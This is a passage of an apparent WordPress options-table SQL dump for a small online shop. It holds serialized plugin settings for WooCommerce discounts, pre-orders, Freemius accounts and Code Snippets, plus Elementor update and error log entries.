text\";}}','yes'),(2611,'wpfdl_version','1.3.3','yes'),(2612,'_wpfd_search_page_id','645','yes'),(2613,'wptml_version','1.3.3','yes'),(2614,'wpfd-category_children','a:0:{}','yes'),(3881,'sdb_setting_page_settings','a:5:{s:30:\"sdb_setting_page_default_badge\";s:1:\"1\";s:34:\"sdb_setting_page_productpage_badge\";s:1:\"1\";s:33:\"sdb_setting_page_text_afternumber\";s:5:\"% off\";s:27:\"sdb_setting_page_background\";s:7:\"#55dd00\";s:27:\"sdb_setting_page_text_color\";s:7:\"#000000\";}','yes'),(3931,'wdp_settings','a:51:{s:46:\"show_unmodified_price_if_discounts_with_coupon\";b:0;s:17:\"show_matched_bulk\";b:0;s:29:\"show_matched_cart_adjustments\";b:0;s:25:\"show_matched_get_products\";b:0;s:24:\"show_matched_adjustments\";b:0;s:18:\"show_matched_deals\";b:0;s:23:\"show_matched_bulk_table\";b:1;s:24:\"show_category_bulk_table\";b:0;s:19:\"show_striked_prices\";b:1;s:17:\"show_onsale_badge\";b:0;s:29:\"limit_results_in_autocomplete\";s:2:\"25\";s:18:\"rule_max_exec_time\";s:1:\"5\";s:14:\"rules_per_page\";s:2:\"50\";s:34:\"support_shortcode_products_on_sale\";b:0;s:31:\"support_shortcode_products_bogo\";b:0;s:38:\"show_cross_out_subtotal_in_cart_totals\";b:0;s:27:\"bulk_table_calculation_mode\";s:20:\"only_bulk_rule_table\";s:17:\"combine_discounts\";b:0;s:21:\"default_discount_name\";s:6:\"Coupon\";s:12:\"combine_fees\";b:0;s:16:\"default_fee_name\";s:3:\"Fee\";s:21:\"default_fee_tax_class\";s:0:\"\";s:28:\"enable_product_html_template\";b:0;s:19:\"price_html_template\";s:14:\"{{price_html}}\";s:21:\"initial_price_context\";s:8:\"nofilter\";s:35:\"do_not_modify_price_at_product_page\";b:0;s:33:\"discount_table_ignores_conditions\";b:0;s:26:\"use_first_range_as_min_qty\";b:0;s:35:\"show_message_after_add_free_product\";b:0;s:39:\"message_template_after_add_free_product\";s:35:\"Added {{qty}} free {{product_name}}\";s:34:\"is_calculate_based_on_wc_precision\";b:0;s:42:\"replace_price_with_min_bulk_price_category\";b:0;s:51:\"replace_price_with_min_bulk_price_category_template\";s:31:\"From {{price}} {{price_suffix}}\";s:21:\"uninstall_remove_data\";b:0;s:30:\"update_prices_while_doing_cron\";b:0;s:34:\"update_prices_while_doing_rest_api\";b:0;s:26:\"allow_to_edit_prices_in_po\";b:0;s:30:\"suppress_other_pricing_plugins\";b:0;s:25:\"allow_to_exclude_products\";b:1;s:14:\"show_debug_bar\";b:0;s:19:\"discount_for_onsale\";s:27:\"compare_discounted_and_sale\";s:17:\"is_override_cents\";b:0;s:16:\"prices_ends_with\";s:2:\"99\";s:25:\"external_coupons_behavior\";s:5:\"apply\";s:26:\"hide_coupon_word_in_totals\";b:0;s:24:\"disable_external_coupons\";s:12:\"dont_disable\";s:15:\"load_in_backend\";b:0;s:33:\"replace_price_with_min_bulk_price\";b:0;s:42:\"replace_price_with_min_bulk_price_template\";s:31:\"From {{price}} {{price_suffix}}\";s:36:\"disable_shipping_calc_during_process\";b:0;s:25:\"support_persistence_rules\";b:0;}','yes'),(3932,'wdp_db_version','4.0.0','no'),(3958,'wpcd_category_discount','s:438:\"a:5:{i:15;a:3:{s:4:\"type\";s:10:\"% of Price\";s:5:\"value\";s:0:\"\";s:8:\"isActive\";s:5:\"false\";}i:35;a:3:{s:4:\"type\";s:10:\"% of Price\";s:5:\"value\";s:0:\"\";s:8:\"isActive\";s:5:\"false\";}i:36;a:3:{s:4:\"type\";s:10:\"% of Price\";s:5:\"value\";s:0:\"\";s:8:\"isActive\";s:5:\"false\";}i:37;a:3:{s:4:\"type\";s:10:\"% of Price\";s:5:\"value\";s:2:\"12\";s:8:\"isActive\";s:5:\"false\";}i:38;a:3:{s:4:\"type\";s:10:\"% of Price\";s:5:\"value\";s:0:\"\";s:8:\"isActive\";s:5:\"false\";}}\";','yes'),(4703,'WPLANG','','yes'),(5964,'woocommerce_sales_record_date','2022-10-27','yes'),(5965,'woocommerce_sales_record_amount','42000','yes'),(6423,'code_snippets_version','3.6.8','yes'),(6424,'code_snippets_settings','a:3:{s:7:\"general\";a:6:{s:19:\"activate_by_default\";b:1;s:21:\"snippet_scope_enabled\";b:1;s:11:\"enable_tags\";b:1;s:18:\"enable_description\";b:1;s:13:\"disable_prism\";b:0;s:18:\"complete_uninstall\";b:0;}s:18:\"description_editor\";a:3:{s:4:\"rows\";i:5;s:12:\"use_full_mce\";b:0;s:13:\"media_buttons\";b:0;}s:6:\"editor\";a:8:{s:5:\"theme\";s:7:\"default\";s:16:\"indent_with_tabs\";b:1;s:8:\"tab_size\";i:4;s:11:\"indent_unit\";i:4;s:10:\"wrap_lines\";b:1;s:12:\"line_numbers\";b:1;s:19:\"auto_close_brackets\";b:1;s:27:\"highlight_selection_matches\";b:1;}}','yes'),(6426,'recovery_mode_email_last_sent','1778720429','yes'),(6496,'recently_activated_snippets','a:0:{}','yes'),(6879,'woocommerce_customer_new_account_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:7:\"subject\";s:29:\"your account has been created\";s:7:\"heading\";s:22:\"welcome to Mango Mitra\";s:18:\"additional_content\";s:35:\"We look forward to seeing you soon.\";s:10:\"email_type\";s:5:\"plain\";}','yes'),(9435,'appmaker_wc_version','1.36.2','no'),(9562,'fs_active_plugins','O:8:\"stdClass\":3:{s:7:\"plugins\";a:1:{s:29:\"tablepress/libraries/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:6:\"2.13.0\";s:4:\"type\";s:6:\"plugin\";s:9:\"timestamp\";i:1766003989;s:11:\"plugin_path\";s:25:\"tablepress/tablepress.php\";}}s:7:\"abspath\";s:35:\"/storage/v6964/gopalak/public_html/\";s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:25:\"tablepress/tablepress.php\";s:8:\"sdk_path\";s:29:\"tablepress/libraries/freemius\";s:7:\"version\";s:6:\"2.13.0\";s:13:\"in_activation\";b:0;s:9:\"timestamp\";i:1766003989;}}','yes'),(9563,'fs_debug_mode','','yes'),(9564,'fs_accounts','a:9:{s:21:\"id_slug_type_path_map\";a:2:{i:10340;a:3:{s:4:\"slug\";s:10:\"tablepress\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:25:\"tablepress/tablepress.php\";}i:1538;a:3:{s:4:\"slug\";s:20:\"restrict-user-access\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:45:\"restrict-user-access/restrict-user-access.php\";}}s:11:\"plugin_data\";a:2:{s:10:\"tablepress\";a:15:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:25:\"tablepress/tablepress.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1671749422;s:16:\"sdk_last_version\";s:6:\"2.12.2\";s:11:\"sdk_version\";s:6:\"2.13.0\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"3.2.5\";s:14:\"plugin_version\";s:5:\"3.2.6\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:23:\"s10333402.saturnwp.link\";s:9:\"server_ip\";s:9:\"127.0.0.1\";s:9:\"is_active\";b:0;s:9:\"timestamp\";i:1766003989;s:7:\"version\";s:5:\"3.2.6\";}s:19:\"last_load_timestamp\";i:1781553248;}s:20:\"restrict-user-access\";a:17:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:45:\"restrict-user-access/restrict-user-access.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1679987770;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:6:\"2.10.1\";s:11:\"sdk_version\";s:6:\"2.11.0\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:3:\"2.7\";s:14:\"plugin_version\";s:5:\"2.7.1\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";N;s:4:\"host\";s:10:\"gopalak.in\";s:9:\"server_ip\";s:9:\"127.0.0.1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1679987770;s:7:\"version\";s:5:\"2.4.2\";}s:15:\"prev_is_premium\";b:0;s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1679987784;s:7:\"version\";s:5:\"2.4.2\";}s:19:\"last_load_timestamp\";i:1747374278;}}s:13:\"file_slug_map\";a:2:{s:25:\"tablepress/tablepress.php\";s:10:\"tablepress\";s:45:\"restrict-user-access/restrict-user-access.php\";s:20:\"restrict-user-access\";}s:7:\"plugins\";a:2:{s:10:\"tablepress\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:10:\"TablePress\";s:4:\"slug\";s:10:\"tablepress\";s:12:\"premium_slug\";s:18:\"tablepress-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:25:\"tablepress/tablepress.php\";s:7:\"version\";s:5:\"3.2.6\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";a:3:{s:3:\"new\";b:1;s:7:\"updates\";b:0;s:9:\"localhost\";b:0;}s:10:\"public_key\";s:32:\"pk_b215ca1bb4041cf43ed137ae7665b\";s:10:\"secret_key\";N;s:2:\"id\";s:5:\"10340\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:1;}s:20:\"restrict-user-access\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:20:\"Restrict User Access\";s:4:\"slug\";s:20:\"restrict-user-access\";s:12:\"premium_slug\";s:28:\"restrict-user-access-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:45:\"restrict-user-access/restrict-user-access.php\";s:7:\"version\";s:5:\"2.7.1\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";s:4:\"3207\";s:17:\"bundle_public_key\";s:32:\"pk_e636ffbaa31bcdaa9d017a9f9a77a\";s:17:\"opt_in_moderation\";a:3:{s:3:\"new\";i:100;s:7:\"updates\";i:0;s:9:\"localhost\";b:0;}s:10:\"public_key\";s:32:\"pk_606dec7b339c246a1bad6a6a04c52\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"1538\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"f5715ebfec03eced81768d2ba26ad9ad\";s:13:\"admin_notices\";a:0:{}s:6:\"addons\";a:0:{}s:12:\"gc_timestamp\";a:0:{}s:10:\"theme_data\";a:0:{}}','yes'),(9565,'fs_gdpr','a:2:{s:2:\"u1\";a:1:{s:8:\"required\";b:0;}s:2:\"u0\";a:1:{s:8:\"required\";b:0;}}','yes'),(9566,'fs_api_cache','a:0:{}','no'),(9569,'mvvwb_version','4.1.0','yes'),(9674,'wceb_set_end_booking_status','automatic','yes'),(9781,'wc_preorders_mode','either','yes'),(9786,'wc_preorders_change_button','yes','yes'),(9787,'wc_preorders_button_text','Preorder Now!','yes'),(9788,'wc_preorders_available_date_single_product','no','yes'),(9789,'wc_preorders_avaiable_date_text','Available on {date_format}','yes'),(9790,'wc_preorders_cart_product_text','Note: this item will be available for shipping in {days_left} days','yes'),(10498,'sdevs_preorder_installed','1643950811','yes'),(10499,'woocommerce_sdevs-preorder-gateway_settings','a:3:{s:7:\"enabled\";s:3:\"yes\";s:5:\"title\";s:9:\"Pay Later\";s:11:\"description\";s:47:\"When product is confirmed then You need to Pay.\";}','yes'),(10500,'sdevs_preorder_version','1.0.3','yes'),(11268,'wp_calendar_block_has_published_posts','1','yes'),(11408,'elementor_log','a:33:{s:32:\"b0017a06e8b022fd27f6617f35a317bd\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-02-04 12:58:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-02-04 12:58:29\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"300e2b40c60c719643ce6cd0a63aceb0\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-02-04 12:58:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-02-04 12:58:29\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"b8e19dbf5d4a05a66335e15f9e47466d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-02-04 12:58:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-02-04 12:58:29\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"eb5fef1445f2e37bbf857fa05fdaa08e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-02-04 12:58:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.4\";s:2:\"to\";s:5:\"3.5.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-02-04 12:58:29\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.4\";s:2:\"to\";s:5:\"3.5.5\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"3cd81d3ba0780c264faae9aac66ae467\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-02-04 12:58:30\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.4\";s:2:\"to\";s:5:\"3.5.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-02-04 12:58:30\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.4\";s:2:\"to\";s:5:\"3.5.5\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"0f1e7231eb59df821b58ba386940e8a7\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-03-01 00:40:45\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.5\";s:2:\"to\";s:5:\"3.5.6\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-03-01 00:40:45\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.5\";s:2:\"to\";s:5:\"3.5.6\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"12d76e638da6d0af6ac6365594cddcde\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:7:\"1060720\";s:7:\"\0*\0file\";s:81:\"https://gopalak.in/wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.7.6\";s:7:\"\0*\0line\";s:1:\"3\";s:7:\"\0*\0date\";s:19:\"2022-09-20 09:46:47\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:76:\"Cannot read properties of null (reading \\&#039;getBoundingClientRect\\&#039;)\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:14;s:14:\"\0*\0times_dates\";a:14:{i:0;s:19:\"2022-09-20 09:46:47\";i:1;s:19:\"2022-09-20 10:17:34\";i:2;s:19:\"2022-09-20 10:17:54\";i:3;s:19:\"2022-09-20 10:18:01\";i:4;s:19:\"2022-09-30 05:47:52\";i:5;s:19:\"2022-09-30 05:47:58\";i:6;s:19:\"2022-09-30 06:01:08\";i:7;s:19:\"2022-09-30 06:01:20\";i:8;s:19:\"2022-09-30 06:01:27\";i:9;s:19:\"2022-09-30 06:41:41\";i:10;s:19:\"2022-09-30 06:44:20\";i:11;s:19:\"2022-10-10 12:13:31\";i:12;s:19:\"2022-10-10 12:15:11\";i:13;s:19:\"2022-10-10 12:15:39\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1663667207\";s:7:\"message\";s:66:\"Cannot read properties of null (reading \\\'getBoundingClientRect\\\')\";s:3:\"url\";s:81:\"https://gopalak.in/wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.7.6\";s:4:\"line\";s:1:\"3\";s:6:\"column\";s:7:\"1060720\";}}s:32:\"89f50e7e8fe4e9efdb809008f12f66b5\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/elementor/core/files/base.php\";s:7:\"\0*\0line\";i:194;s:7:\"\0*\0date\";s:19:\"2022-09-30 11:20:35\";s:7:\"\0*\0type\";s:7:\"warning\";s:10:\"\0*\0message\";s:142:\"file_put_contents(/storage/v6964/gopalak/public_html/wp-content/uploads/elementor/css/post-1373.css): failed to open stream: Permission denied\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:23;s:14:\"\0*\0times_dates\";a:23:{i:0;s:19:\"2022-09-30 11:20:35\";i:1;s:19:\"2022-10-03 10:12:35\";i:2;s:19:\"2022-10-03 10:13:29\";i:3;s:19:\"2022-10-03 10:14:29\";i:4;s:19:\"2022-10-03 10:15:32\";i:5;s:19:\"2022-10-03 10:15:50\";i:6;s:19:\"2022-10-07 10:02:01\";i:7;s:19:\"2022-10-07 10:02:30\";i:8;s:19:\"2022-10-07 10:03:27\";i:9;s:19:\"2022-10-07 10:06:24\";i:10;s:19:\"2022-10-07 10:07:19\";i:11;s:19:\"2022-10-10 15:26:15\";i:12;s:19:\"2022-10-10 15:26:20\";i:13;s:19:\"2022-10-10 15:27:06\";i:14;s:19:\"2022-10-12 10:31:32\";i:15;s:19:\"2022-10-12 10:32:00\";i:16;s:19:\"2022-10-12 10:32:17\";i:17;s:19:\"2022-10-12 10:32:50\";i:18;s:19:\"2022-10-12 12:44:37\";i:19;s:19:\"2022-10-12 12:45:00\";i:20;s:19:\"2022-10-13 15:42:46\";i:21;s:19:\"2022-10-13 15:44:04\";i:22;s:19:\"2022-10-13 15:44:54\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:7:\"warning\";s:7:\"message\";s:142:\"file_put_contents(/storage/v6964/gopalak/public_html/wp-content/uploads/elementor/css/post-1373.css): failed to open stream: Permission denied\";s:4:\"file\";s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/elementor/core/files/base.php\";s:4:\"line\";i:194;s:5:\"trace\";b:1;}}s:32:\"9632535aba6e51613de74b43f3656451\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-11 03:27:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-11 03:27:20\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"a5bfa486a59537a207ea75de35684e07\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-11 03:27:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-11 03:27:20\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"236282449d5a2079f5a475a16dc3b516\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-11 03:27:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-11 03:27:20\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"d766d73ab7bdc24ab0c7ab5470e9daa5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-11 03:27:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.5\";s:2:\"to\";s:5:\"3.7.8\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-11 03:27:20\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.5.5\";s:2:\"to\";s:5:\"3.7.8\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"458cfe8b9abdcacc15cb4a6c984faf98\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/elementor/core/files/base.php\";s:7:\"\0*\0line\";i:194;s:7:\"\0*\0date\";s:19:\"2022-10-19 12:47:21\";s:7:\"\0*\0type\";s:7:\"warning\";s:10:\"\0*\0message\";s:142:\"file_put_contents(/storage/v6964/gopalak/public_html/wp-content/uploads/elementor/css/post-1816.css): failed to open stream: Permission denied\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:8;s:14:\"\0*\0times_dates\";a:8:{i:0;s:19:\"2022-10-19 12:47:21\";i:1;s:19:\"2022-10-19 12:48:15\";i:2;s:19:\"2022-10-19 12:49:11\";i:3;s:19:\"2022-10-19 12:58:28\";i:4;s:19:\"2022-10-19 13:24:16\";i:5;s:19:\"2022-10-19 13:27:33\";i:6;s:19:\"2022-11-03 09:41:09\";i:7;s:19:\"2022-11-03 09:42:41\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:7:\"warning\";s:7:\"message\";s:142:\"file_put_contents(/storage/v6964/gopalak/public_html/wp-content/uploads/elementor/css/post-1816.css): failed to open stream: Permission denied\";s:4:\"file\";s:83:\"/storage/v6964/gopalak/public_html/wp-content/plugins/elementor/core/files/base.php\";s:4:\"line\";i:194;s:5:\"trace\";b:1;}}s:32:\"8b8c6294507a407b44e9118820b8bcad\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:6:\"692080\";s:7:\"\0*\0file\";s:81:\"https://gopalak.in/wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.7.8\";s:7:\"\0*\0line\";s:1:\"3\";s:7:\"\0*\0date\";s:19:\"2022-10-20 11:50:17\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:32:\"T.getContainer is not a function\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:8;s:14:\"\0*\0times_dates\";a:8:{i:0;s:19:\"2022-10-20 11:50:17\";i:1;s:19:\"2022-10-20 11:50:36\";i:2;s:19:\"2022-10-20 11:50:45\";i:3;s:19:\"2022-10-20 11:52:11\";i:4;s:19:\"2022-10-20 11:52:36\";i:5;s:19:\"2022-10-20 11:53:07\";i:6;s:19:\"2022-10-20 11:53:36\";i:7;s:19:\"2022-10-20 11:54:06\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1666266617\";s:7:\"message\";s:32:\"T.getContainer is not a function\";s:3:\"url\";s:81:\"https://gopalak.in/wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.7.8\";s:4:\"line\";s:1:\"3\";s:6:\"column\";s:6:\"692080\";}}s:32:\"798645c8e14ec681dcc8c3d6ee4a3a03\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-31 03:25:49\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.7.8\";s:2:\"to\";s:5:\"3.8.0\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-31 03:25:49\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.7.8\";s:2:\"to\";s:5:\"3.8.0\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"08a973883a377276b043336e48b7a9ce\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-31 03:25:49\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-31 03:25:49\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"e25156fda97e17e6cff95ced28771096\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-31 03:25:49\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-31 03:25:49\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"5ce3d55d322160349cfa7785c42c201f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-31 03:25:49\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version 